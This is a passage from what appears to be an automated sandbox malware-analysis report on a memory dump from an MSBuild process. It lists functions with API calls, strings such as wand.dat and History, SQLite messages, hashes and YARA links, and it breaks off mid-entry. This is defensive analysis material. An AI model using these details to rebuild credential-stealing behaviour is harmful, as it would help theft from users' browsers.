Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59

Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON

Download Yara Rule

Strings

foreign key constraint failed, xrefs: 00435D01
old, xrefs: 00435AE5
new, xrefs: 00435AEF
oid, xrefs: 00435B2B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65

Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?), ref: 00431771
memcpy.MSVCRT(?,?,00000000), ref: 00431888

Strings

unknown column "%s" in foreign key definition, xrefs: 00431858
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
foreign key on %s should reference only one column of table %T, xrefs: 004316CD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 3510742995-272990098
Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0044A6EB
memset.MSVCRT ref: 0044A6FB
memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA

Strings

gj, xrefs: 0044A700

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: gj
API String ID: 1297977491-4203073231
Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756

Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B

??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
free.MSVCRT ref: 0040E9D3

Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF

Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00417497
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
malloc.MSVCRT ref: 004174BD
WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
free.MSVCRT ref: 004174E4

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$ApisFilefreemalloc
String ID:
API String ID: 4053608372-0
Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9

Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040D453
GetWindowRect.USER32(?,?), ref: 0040D460
GetClientRect.USER32(00000000,?), ref: 0040D46B
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5

Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
memset.MSVCRT ref: 004450CD

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0

Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D

CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
String ID:
API String ID: 1471605966-0
Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD

Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0044475F
wcscat.MSVCRT ref: 0044476E
wcscat.MSVCRT ref: 0044477F
wcscat.MSVCRT ref: 0044478E

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3

Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC

Strings

\StringFileInfo\, xrefs: 00444759

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 102104167-2245444037
Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69

Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C

Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040AAF2
_memicmp.MSVCRT ref: 0040AB20

Strings

History, xrefs: 0040AAEC, 0040AAF1, 0040AB1E
@@@@, xrefs: 0040AB09

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _memicmpwcslen
String ID: @@@@$History
API String ID: 1872909662-685208920
Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657

Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004100FB
memset.MSVCRT ref: 00410112

Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE

_snwprintf.MSVCRT ref: 00410141

Strings

</%s>, xrefs: 00410130

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99

Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D58D
SetWindowTextW.USER32(?,?), ref: 0040D5BD
EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD

Strings

caption, xrefs: 0040D5A2

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D

Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47

CreateFontIndirectW.GDI32(?), ref: 00401156
SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193

Strings

MS Sans Serif, xrefs: 00401142

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
String ID: MS Sans Serif
API String ID: 210187428-168460110
Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658

Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00409D9E
GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
_wcsicmp.MSVCRT ref: 00409DC7

Strings

edit, xrefs: 00409DC1

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ClassName_wcsicmpmemset
String ID: edit
API String ID: 2747424523-2167791130
Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45

Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43

Strings

shlwapi.dll, xrefs: 00414E15
SHAutoComplete, xrefs: 00414E23

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
String ID: SHAutoComplete$shlwapi.dll
API String ID: 3150196962-1506664499
Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D

Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725

Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00412A49
memset.MSVCRT ref: 00412A5F
memset.MSVCRT ref: 00412A71
memcpy.MSVCRT(?,67452301,00000010,00444F90,?,0044EB0C), ref: 00412A96
memset.MSVCRT ref: 00412AA0

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D

Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15

Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A

GetMenu.USER32(?), ref: 00410F8D
GetSubMenu.USER32(00000000), ref: 00410F9A
GetSubMenu.USER32(00000000), ref: 00410F9D
CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$ItemMessageSend$CheckEnableRadio
String ID:
API String ID: 1889144086-0
Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54

Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
GetLastError.KERNEL32 ref: 0041810A
CloseHandle.KERNEL32(00000000), ref: 00418120

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID:
API String ID: 1661045500-0
Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99

Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB

memcpy.MSVCRT(?,?,?), ref: 0042EC7A

Strings

Cannot add a column to a view, xrefs: 0042EBE8
sqlite_altertab_%s, xrefs: 0042EC4C
virtual tables may not be altered, xrefs: 0042EBD2

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1297977491-2063813899
Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88

Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040560C

Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C

Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1

Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3

Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269

Strings

*.*, xrefs: 0040564D
dat, xrefs: 00405611
wand.dat, xrefs: 00405632

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
String ID: *.*$dat$wand.dat
API String ID: 2618321458-1828844352
Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89

Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0

wcslen.MSVCRT ref: 00410C74
_wtoi.MSVCRT(?), ref: 00410C80
_wcsicmp.MSVCRT ref: 00410CCE
_wcsicmp.MSVCRT ref: 00410CDF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp$??2@??3@_wtoiwcslen
String ID:
API String ID: 1549203181-0
Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
